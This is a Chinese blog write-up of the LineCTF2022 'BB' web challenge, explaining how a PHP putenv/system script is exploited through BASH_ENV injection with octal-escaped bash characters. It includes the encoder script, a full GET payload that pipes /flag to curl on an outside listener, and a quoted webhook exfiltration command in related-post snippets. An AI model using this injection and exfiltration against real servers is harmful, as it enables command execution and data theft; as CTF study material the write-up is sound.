[LineCTF2022]BB

最新推荐文章于 2024-03-09 22:43:41 发布
最新推荐文章于 2024-03-09 22:43:41 发布
阅读量1.5k 收藏 1
点赞数 3
分类专栏: CTF刷题记录 文章标签: CTF Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/125351004
版权

[LineCTF2022]BB

文章目录

进去之后就是源码

<?php
    error_reporting(0);

    function bye($s, $ptn){
        if(preg_match($ptn, $s)){   //$s中如果存在$ptn,则返回false
            return false;
        }
        return true;
    }

    foreach($_GET["env"] as $k=>$v){
        if(bye($k, "/=/i") && bye($v, "/[a-zA-Z]/i")) { //过滤= 过滤大小写字母
            putenv("{$k}={$v}");        //定义环境变量
        }
    }
    system("bash -c 'imdude'");     //这里执行了imdude,所以我们要对环境变量imdude进行操作
    
    foreach($_GET["env"] as $k=>$v){
        if(bye($k, "/=/i")) {   //过滤=
            putenv("{$k}");
        }
    }
    highlight_file(__FILE__);
?>

绕过preg_match,在Linux中

$'\101' = A
第一个是八进制

ord 字符转对应的ascii

oct 十进制转八进制

在这里插入图片描述

然后通过[2:]从第三个字符开始截取字符串

在这里插入图片描述

>>> oct(ord("c"))[2:]
'143'
>>> oct(ord("a"))[2:]
'141'
>>> oct(ord("t"))[2:]
'164'

在这里插入图片描述

所以可以根据这个生成脚本,但是要注意空格的影响,

将空格也进行修改的话,命令执行有问题

在这里插入图片描述

如果不对空格进行操作,那么截断处,就要重新用$''进行闭合

在这里插入图片描述

所以直接将所有的字符进行单个处理

在这里插入图片描述

环境变量注入,参考P神的文章:我是如何利用环境变量注入执行任意命令 - 跳跳糖 (tttang.com)

import string

# cmd = "cat /flag"
cmd = "cat /flag | curl -d @- http://xx.xx.xx.xx:7001"
str = ''
for i in cmd:
    if i in string.ascii_lowercase:
        j = oct(ord(i))[2:]
        str += "$'\\"+j+"'"
    else:
        str+=i

print(str)

监听端口

nc -lvp 7001

GET传参

?env[BASH_ENV]=`$'\143'$'\141'$'\164' /$'\146'$'\154'$'\141'$'\147' | $'\143'$'\165'$'\162'$'\154' -$'\144' @- $'\150'$'\164'$'\164'$'\160'://xx.xx.xx.xx:7001`

在这里插入图片描述

0x为16进制数字的表示

\x为16进制的字符串表示

\ 为八进制的表示

50是2的ascii码对应值

0x32是十六进制表示,转为十进制就是50

\x32表示50对应的字符串,也就是"2"

在这里插入图片描述

比如

在这里插入图片描述

Sk1y
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linectf2022 online-library_[LineCTF2022]gotm
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-05 867
linectf2022 online-library_[LineCTF2022]gotm linectf2022 online-library源码,分析一下几个路由和对应的请求处理函数, [LineCTF2022]gotm注册功能:func regist_handler(w http.ResponseWriter, r *http.Request) { uid := r.FormValue("id") upw := r.FormValue("pw") if uid == "" ||
express.js-ctf:用express.js编写的CTF挑战
05-04
express.js-ctf 智力,技能等方面的测试。
ctfer的日常web:[LineCTF2022]BB(buuctf
最新发布
Hunter1_1的博客
03-09 442
向指定的 webhook 站点[]发送一个 POST 请求,并上传了一个名为 flag 的文件。 b"curl https://webhook.site/a27433a-afdb-9d9a080beb55 -F flag=@/flag" 这个命令的具体含义如下: curl: 是一个命令行工具,用于在终端中传输数据,支持多种协议。 https://webhook.site/a278d631-e3e5-433a-afdb-9d9a080beb55: 这是一个 webhook 站点的 URL,其中包含。。。。。。
buuctf 2022 3.9
m0_57754423的博客
03-10 4790
ciscn_2019_es_1 保护机制: 保护全开 漏洞点: 这里指针未清空,存在uaf漏洞。 利用思路: 首先malloc一个size大于0x408的chunk,这样的话 就可以绕过tcache了。 然后free掉,之后再dump一下,就可以泄露main_arena + 96 的地址了 这样就可以获得 libc的基地址 和 free_hook了 利用tcache 的double free漏洞 修改fd指针 然后malloc 这样就可以写入free_hook为 one_gad
HFCTF2022 Web ezphp
Sk1y的博客
03-28 5663
HFCTF2022 文章目录HFCTF2022ezphp ezphp 这个题目本来以为考点是p佬的文章,但是不是这样的。 p佬文章:我是如何利用环境变量注入执行任意命令
[2022 ACTF]web题目复现
cosmoslin的博客
07-06 1601
查看dockerfile发现题目使用环境为goahead5.1.4,联想到p神对于该漏洞的复现记录,我们有两种方法解题:GoAhead环境变量注入复现踩坑记hack.c 编译 exp.py exp.py 简单看一下代码逻辑:server.js 整个题目通过websockets通信,当api为getflag时传入flagbot 这里发现admin登录没有任何限制,那么我们登录admin再传入getflag即可 原型链污染: xss: ToLeSion 考点: TLS-Poison 一篇文章带你读懂 TLS
[LineCTF2022]gotm ( golang SSTI + JWT伪造 )
ShenZ的博客
04-15 5340
我们的思路是利用ssti得到secret_key,再伪造jwt即可得到flag。 如果是正常思路我们应该{{.secret_key}}注入得到key字段,但是root_handler函数中得到的acc是数组中的地址,也就是get_account函数通过在全局变量acc数组中查找我们的用户,这种情况下直接注入{{.secret_key}}会返回空 我们的payload应该是{{.}},可以得到 Account结构的所有字段 /regist?id={{.}}&pw=123 /auth?id={{.}}&
[LineCTF2022]Memo Drive
qq_41513009的博客
05-12 201
漏洞的成因是 Starlette 错误地把分号当成参数的分割符,分号后面的字符串将被当成query_params.keys(),因此如果参数设置成view?/会被当成query_params.keys()拼接到filename之前,最终代码中的path就会变成。这里涉及到CVE-2021-23336:https://github.com/encode/starlette/issues/1325。但是这只是一个假的flag,我们需要使用burp爆破目录读取文件,发现在/proc/1/environ中。
2022 lineCTF WEB复现WriteUp
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-06 677
lineCTF WEB复现WriteUp Gotm, is_admin == true就给flag,需要伪造token,需要秘钥才行 再往下看,经典SSTI 如果能控制acc也就是id为{{.}},就能得到这三个的值,然后id可控,直接打就行了 接下来思路就很简单了,先注册一个id为{{.}}的用户: is_admin == true就给flag,需要伪造token,需要秘钥才行 再往下看,经典SSTI, 如果能控制acc也就是id为{{.}},就能得到这三个的值,然后id可控,直接打就行了 接下来思路就很
LINECTF2022 web之Memo Driver完整题解
qq_38338511的博客
03-18 353
发现flag文件里没有我们需要的flag,以BUU环境的习惯,肯定是又藏在了env环境变量里了。/proc/{pid}/environ 常用来读取环境变量中的SECRET_KEY或FLAG。没绕过request.query和request.queryparam,一个是用。发现还是没有flag,尝试bp爆破PID。(以CTF出题人的习惯)这题重点的地方在于path,会进行读取输出,flag在上一个目录。下载题目源码打开index.py进行分析。
2022DASCTF MAY 出题人挑战赛
Sk1y的博客
05-26 665
2022DASCTF MAY 出题人挑战赛 文章目录2022DASCTF MAY 出题人挑战赛Power魔法浏览器 Power Cookie发包,回显中有个 在cookie加一个 admin=1 得到flag DASCTF{ad2e3900-06dd-4b04-9cec-1a8878a3777f} 魔法浏览器 f12查看 然后修改报文 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
LineCTF2022】Memo Driver
weixin_60581972的博客
09-30 588
在proc/self/cmdline 发现pythonindex.py 最后 也没能读取出来...hh。再之后读取proc/self/environ 发现一个假的flag。之后就想着嗖哈一把嗦,直接bp跑脚本,没想到第一个就是 = =这里发现memo,以为是读取命令执行记录(错误示范...)详细绕过可以去看这个文章,这里只是寻找buu flag。读取无果之后最后只能尝试其他方法了。
[NISACTF 2022]WriteUp web
Pysnow's Blog
04-01 4451
[NISACTF 2022] WEB checkin 打开一看,本来一位就是简单的一道get传参题,结果发现复制的时候出现了问题 所以我就把代码复制到vscode上面来 发现存在Unicode特殊字符,直接把字符原样复制下来,然后URLencode编码一下 最终payload ?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%
Real World CTF 2022 两道web题wp
yink12138的博客
02-09 5012
Hack into Skynet 给了源码,先审一下 #!/usr/bin/env python3 import flask import psycopg2 import datetime import hashlib from skynet import Skynet app = flask.Flask(__name__, static_url_path='') skynet = Skynet() def skynet_detect(): req = { 'method
[HFCTF 2022]两道web题目wp
cosmoslin的博客
03-28 6654
ezphp <?php (empty($_GET["env"])) ? highlight_file(__FILE__) : putenv($_GET["env"]) && system('echo hfctf2022');?> 看到这段代码不难联想到P神的博客 我是如何利用环境变量注入执行任意命令 题目给了一个docker用于本地搭建环境,可以发现题目用的系统环境为debian。在debian系操作系统中,sh指向dash;在centos系操作系统中,sh指向bash。 由于
[*CTF 2022 pwn] examination
weixin_52640415的博客
04-17 554
抽空参加个比赛,水平有限只作了一道题,但还是要记录一下,毕竟好多人还0解呢。学渣的逆袭。 英文写的是ret2shool 这个跟ret2XXX的没关系。 代码长了读程序就麻烦,慢慢读把函数功能整理如下(叫法随个人理解,英文看单词不认识): 教师菜单 增加学生:增加一个学生结构,管理块chunk :0x28含指向成绩单:stud{ptr_s,0,0,0,0} 成绩单chunk:0x18含学生评级,成绩,评价指针,评价长度 s{int idx,int score, ptr_prv,int x,int pr
虎符CTF 2022 mva
weixin_46483787的博客
03-21 982
前言: 昨天刚结束的虎符CTF的一道题,开始的太晚了,比赛结束半个小时才做出来,略显可惜 逆向分析: 拿到程序,稍做处理后可以看到,首先是让我们输入一段0x100的字节,然后开始取指-执行-取指-执行的过程,实现了一个小型的计算系统 然后我们简单的进行一些重命名,识别出一些结构来: 如push和pop: 设置寄存器的值 以及一些加减乘除和寄存器赋值等操作就不一一放截图了 漏洞 我们熟知VM的题漏洞基本都是边界检测的问题,sp的检测啊,寄存器指针的检测啊等等,本题也不例外 首先发现的是这两个地方: c
虎符CTF-2022 babygame 题解
CoLin的pwn小屋
04-01 1026
虎符CTF最简单的一道pwn题。
[虎符CTF] ezphp:LD_PRELOAD环境变量注入
Landasika的博客
05-17 996
目录 思路遇到的问题什么是.so文件什么是LD_PRELOAD构造.so文件找到Nginx的缓存文件的目录遇到的问题找到缓存目录上传.so 思路 参考链接: http://y24.top/posts/%E6%96%87%E7%AB%A0/2022%E8%99%8E%E7%AC%A6ctf/ https://tttang.com/archive/1384/ https://www.anq...
Linux Bash
玥晓珖的博客
11-05 944
很久没更新博客了,最近在波士顿访学,开始了学习Linux之旅。     首先了解下shell: 在介绍bash之前,需要先介绍它的起源——shell。shell俗称壳,它是指UNIX系统下的一个命令解析器;主要用于用户和系统的交互。UNIX系统上有很多种Shell。首个shell,即Bourne Shell,于1978年在V7(AT&amp;T的第7版)UNIX上推出。后来,又演变出C s...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值